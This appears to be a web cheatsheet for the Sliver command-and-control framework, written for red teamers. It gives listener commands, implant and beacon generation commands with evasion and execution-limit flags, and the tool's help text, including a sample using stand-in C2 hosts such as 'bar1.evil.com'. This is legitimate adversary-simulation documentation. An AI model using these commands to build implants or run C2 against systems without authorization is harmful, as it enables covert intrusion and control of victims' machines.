Tools/Sliver C2 Cheatsheet
Purple Sliver Framework

Sliver C2 Cheatsheet

A complete and practical cheatsheet for Sliver, the open-source Command and Control (C2) framework used by red teams and penetration testers for secure post-exploitation, beaconing, and multi-platform payload delivery.

What is Sliver?

Sliver is an advanced open-source Command and Control (C2) framework developed for red team operations, adversary simulation, and stealthy post-exploitation. Designed for security professionals, it supports multi-platform implants (Windows, Linux, macOS), encrypted C2 channels (mTLS, HTTP(S), DNS, WireGuard), and modern tooling that rivals commercial solutions.

Sliver enables operators to:

  • Generate flexible implants across multiple OS and architectures
  • Establish secure connections with encrypted traffic
  • Execute real-time or delayed tasks using session or beacon implants
  • Maintain stealth and persistence in complex network environments

Its modular structure, built-in scripting, and RPC interface make Sliver an essential part of any modern red team toolkit.

Sliver is a powerful command and control (C2) framework designed to provide advanced capabilities for covertly managing and controlling remote systems. With Sliver, security professionals, red teams, and penetration testers can easily establish a secure and reliable communication channel over Mutual TLS, HTTP(S), DNS, or Wireguard with target machines. Enabling them to execute commands, gather information, and perform various post-exploitation activities. The framework offers a user-friendly console interface, extensive functionality, and support for multiple operating systems as well as multiple CPU architectures, making it an indispensable tool for conducting comprehensive offensive security operations. (Taken from Sliver Wiki)

Resources

Starting Listeners

Use the following commands to start listeners on your Sliver server:

MTLS Listener
mtls -l 443 -L 0.0.0.0 -p
HTTP Listener
http -l 443 -L 0.0.0.0 -p
DNS Listener
dns -l 53 -L 0.0.0.0 -p
Wireguard Listener
wg -l 53 -L 0.0.0.0 -p

Generating Implants

Sliver implants offer two communication modes: sessions and beacons, each designed for different operational needs in red team engagements and post-exploitation scenarios.

Understanding Sessions vs. Beacons

Sliver implants support two primary communication modes:

  • Session Mode: Establishes a persistent, long-polling TCP connection. This enables immediate execution of commands and real-time interaction, suitable for active engagements.
  • Beacon Mode: Designed for stealth operations. The implant checks in at scheduled intervals and sleeps between callbacks. You can configure beacon intervals (e.g., every 6 hours) to reduce detection risk, then switch to a shorter interval for active control.

This flexible implant behavior allows operators to optimize between stealth and responsiveness.

Commands

Highlights:

  • Supports --mtls, --http, --dns, --wg, --tcp-pivot, and --named-pipe C2 protocols
  • Output formats: Windows PE/DLL/Shellcode, Linux ELF, macOS Mach-O
  • Supports advanced flags for evasion, debugging, profiling, and DNS canaries
Generate Beacon Shellcode
generate beacon --mtls <ip address>:<port> -f shellcode
Generate Beacon Binary
generate beacon --http <ip address>:<port>
Sliver Generate Beacon
generate --help
 
Command: generate <options>
About: Generate a new sliver binary and saves the output to the cwd or a path specified with --save.
 
++ Command and Control ++
You must specificy at least one c2 endpoint when generating an implant, this can be one or more of --mtls, --wg, --http, or --dns, --named-pipe, or --tcp-pivot.
The command requires at least one use of --mtls, --wg, --http, or --dns, --named-pipe, or --tcp-pivot.
 
The follow command is used to generate a sliver Windows executable (PE) file, that will connect back to the server using mutual-TLS:
	generate --mtls foo.example.com
 
The follow command is used to generate a sliver Windows executable (PE) file, that will connect back to the server using Wireguard on UDP port 9090,
then connect to TCP port 1337 on the server's virtual tunnel interface to retrieve new wireguard keys, re-establish the wireguard connection using the new keys,
then connect to TCP port 8888 on the server's virtual tunnel interface to establish c2 comms.
	generate --wg 3.3.3.3:9090 --key-exchange 1337 --tcp-comms 8888
 
You can also stack the C2 configuration with multiple protocols:
	generate --os linux --mtls example.com,domain.com --http bar1.evil.com,bar2.attacker.com --dns baz.bishopfox.com
 
 
++ Formats ++
Supported output formats are Windows PE, Windows DLL, Windows Shellcode, Mach-O, and ELF. The output format is controlled
with the --os and --format flags.
 
To output a 64bit Windows PE file (defaults to WinPE/64bit), either of the following command would be used:
	generate --mtls foo.example.com
	generate --os windows --arch 64bit --mtls foo.example.com
 
A Windows DLL can be generated with the following command:
	generate --format shared --mtls foo.example.com
 
To output a MacOS Mach-O executable file, the following command would be used
	generate --os mac --mtls foo.example.com
 
To output a Linux ELF executable file, the following command would be used:
	generate --os linux --mtls foo.example.com
 
 
++ DNS Canaries ++
DNS canaries are unique per-binary domains that are deliberately NOT obfuscated during the compilation process.
This is done so that these unique domains show up if someone runs 'strings' on the binary, if they then attempt
to probe the endpoint or otherwise resolve the domain you'll be alerted that your implant has been discovered,
and which implant file was discovered along with any affected sessions.
 
Important: You must have a DNS listener/server running to detect the DNS queries (see the "dns" command).
 
Unique canary subdomains are automatically generated and inserted using the --canary flag. You can view previously generated
canaries and their status using the "canaries" command:
	generate --mtls foo.example.com --canary 1.foobar.com
 
++ Execution Limits ++
Execution limits can be used to restrict the execution of a Sliver implant to machines with specific configurations.
 
++ Profiles ++
Due to the large number of options and C2s this can be a lot of typing. If you'd like to have a reusable a Sliver config
see 'help profiles new'. All "generate" flags can be saved into a profile, you can view existing profiles with the "profiles"
command.
 
 
Usage:
======
  generate [flags]
 
Flags:
======
  -a, --arch               string    cpu architecture (default: amd64)
  -c, --canary             string    canary domain(s)
  -d, --debug                        enable debug features
  -O, --debug-file         string    path to debug output
  -G, --disable-sgn                  disable shikata ga nai shellcode encoder
  -n, --dns                string    dns connection strings
  -e, --evasion                      enable evasion features (e.g. overwrite user space hooks)
  -E, --external-builder             use an external builder
  -f, --format             string    Specifies the output formats, valid values are: 'exe', 'shared' (for dynamic libraries), 'service' (see `psexec` for more info) and 'shellcode' (windows only) (default: exe)
  -h, --help                         display help
  -b, --http               string    http(s) connection strings
  -X, --key-exchange       int       wg key-exchange port (default: 1337)
  -w, --limit-datetime     string    limit execution to before datetime
  -x, --limit-domainjoined           limit execution to domain joined machines
  -F, --limit-fileexists   string    limit execution to hosts with this file in the filesystem
  -z, --limit-hostname     string    limit execution to specified hostname
  -L, --limit-locale       string    limit execution to hosts that match this locale
  -y, --limit-username     string    limit execution to specified username
  -k, --max-errors         int       max number of connection errors (default: 1000)
  -m, --mtls               string    mtls connection strings
  -N, --name               string    agent name
  -p, --named-pipe         string    named-pipe connection strings
  -o, --os                 string    operating system (default: windows)
  -P, --poll-timeout       int       long poll request timeout (default: 360)
  -j, --reconnect          int       attempt to reconnect every n second(s) (default: 60)
  -R, --run-at-load                  run the implant entrypoint from DllMain/Constructor (shared library only)
  -s, --save               string    directory/file to the binary to
  -l, --skip-symbols                 skip symbol obfuscation
  -Z, --strategy           string    specify a connection strategy (r = random, rd = random domain, s = sequential)
  -T, --tcp-comms          int       wg c2 comms port (default: 8888)
  -i, --tcp-pivot          string    tcp-pivot connection strings
  -I, --template           string    implant code template (default: sliver)
  -t, --timeout            int       command timeout in seconds (default: 60)
  -g, --wg                 string    wg connection strings
 
Sub Commands:
=============
  beacon  Generate a beacon binary
  info    Get information about the server's compiler
  stager  Generate a stager using Metasploit (requires local Metasploit installation)

Post-Exploitation

List Sessions
[server] sliver > sessions
Using a Beacon
[server] sliver > use <beacon_id>

Help

Sliver Help
[server] sliver > help
 
Commands:
=========
  clear       clear the screen
  exit        exit the shell
  help        use 'help [command]' for command help
  monitor     Monitor threat intel platforms for Sliver implants
  wg-config   Generate a new WireGuard client config
  wg-portfwd  List ports forwarded by the WireGuard tun interface
  wg-socks    List socks servers listening on the WireGuard tun interface
 
 
Generic:
========
  aliases           List current aliases
  armory            Automatically download and install extensions/aliases
  background        Background an active session
  beacons           Manage beacons
  builders          List external builders
  canaries          List previously generated canaries
  cursed            Chrome/electron post-exploitation tool kit (∩`-´)⊃━☆゚.*・。゚
  dns               Start a DNS listener
  env               List environment variables
  generate          Generate an implant binary
  hosts             Manage the database of hosts
  http              Start an HTTP listener
  https             Start an HTTPS listener
  implants          List implant builds
  jobs              Job control
  licenses          Open source licenses
  loot              Manage the server's loot store
  mtls              Start an mTLS listener
  prelude-operator  Manage connection to Prelude's Operator
  profiles          List existing profiles
  reaction          Manage automatic reactions to events
  regenerate        Regenerate an implant
  sessions          Session management
  settings          Manage client settings
  stage-listener    Start a stager listener
  tasks             Beacon task management
  update            Check for updates
  use               Switch the active session or beacon
  version           Display version information
  websites          Host static content (used with HTTP C2)
  wg                Start a WireGuard listener
 
 
Multiplayer:
============
  kick-operator  Kick an operator from the server
  multiplayer    Enable multiplayer mode
  new-operator   Create a new operator config file
  operators      Manage operators
 
 
For even more information, please see our wiki: https://github.com/BishopFox/sliver/wiki

Last updated on

Nmap Cheatsheet

Nmap (Network Mapper) is a powerful open-source tool I use for network discovery, port scanning, and security auditing. It's essential in ethical hacking, penetration testing, and system administration for identifying hosts, open ports, services, and potential vulnerabilities across networks. My experience with Nmap includes using advanced features like the Nmap Scripting Engine (NSE) for automation and detailed reconnaissance, helping ensure networks are secure and well-documented.

On this page